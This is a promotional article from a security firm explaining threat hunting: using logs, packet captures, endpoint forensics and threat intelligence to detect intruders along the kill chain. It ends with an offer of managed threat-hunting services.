Threat Hunting is the term used to describe the proactive approach to cyber security that includes finding, identifying and understanding the threats and malicious activity within your network. While hacking tools and malware are constantly evolving, the cybersecurity kill chain doesn’t, and it’s the evidence left by each step of the kill chain that allows threat hunters to more reliably detect intruders in their network.
Threat Hunting combines logs, packet captures, endpoint security and threat intelligence feeds together in one security analytics platform, to allow specially trained analysts to execute targeted investigations that take into account the unique circumstances and risk profile of an organisation.
In a typical hunt, the security analytics platform highlights suspicious events and devices, in a similar way that a SIEM or a SOC currently does. Suspicion can be raised on a number of indicators, including connection to known Command and Control networks, unusual user activity, such as creating a new administrator using command line tools, or unusual system activity, such as Internet Explorer starting a PowerShell or command shell.
The threat hunter will then investigate the impacted devices. With the help of packet captures and endpoint forensic information, the threat hunter can investigate everything from the processes running (and compare them against known good copies), the hashes of binary files, the process tree, and inspect the content of traffic to and from the suspect machines. Even when the attacker is using single-use malware, and is trying to be extremely stealthy, this is likely to reveal to the threat hunter evidence that the device has been compromised.
In a recent SANS Institute survey of IT professionals 86% of respondents said they were engaged in some kind of Threat Hunting, and almost 60% of respondents said it had enhanced the speed and success of their incident response. Despite all of this, 40% of organisations did not have a formal, continuous Threat Hunting procedure in place.
Although ad-hoc hunting is better than being willfully blind, a consistent methodology executed by experienced threat hunters on a high quality security analytics platform is critical in detecting and evicting attackers before they can establish a foothold and find and exfiltrate data. Threat Hunting is critical for early detection and enabling rapid response to successful compromises.
The best threat hunters are usually those who are experienced ethical hackers: Intimate knowledge of the steps that a hacker must perform to gain access and control of a network, and the evidence that this is likely to leave, gives the threat hunter a substantial edge in dismissing false positives, and investigating the most likely incidents first.
While a SIEM or SOC software is the cornerstone of a solid threat hunting platform, additional tools that give visibility into network traffic, endpoint processes, as well as a quality threat intelligence feed is required for investigations to produce a relevant conclusion. These tools together can turn a correlated event with no context into a definitive forensic analysis into what triggered the alert.
Content Security is offering customised threat hunting services, which can include anything from fully managed services, to helping you stand up the infrastructure or train your existing SOC/NOC staff to perform Threat Hunting. If you want full visibility into what malicious parties inside your network are doing (including disgruntled employees), contact Content Security for a confidential obligation free discussion.
Content Security & RSA Threat Hunting Series 1.0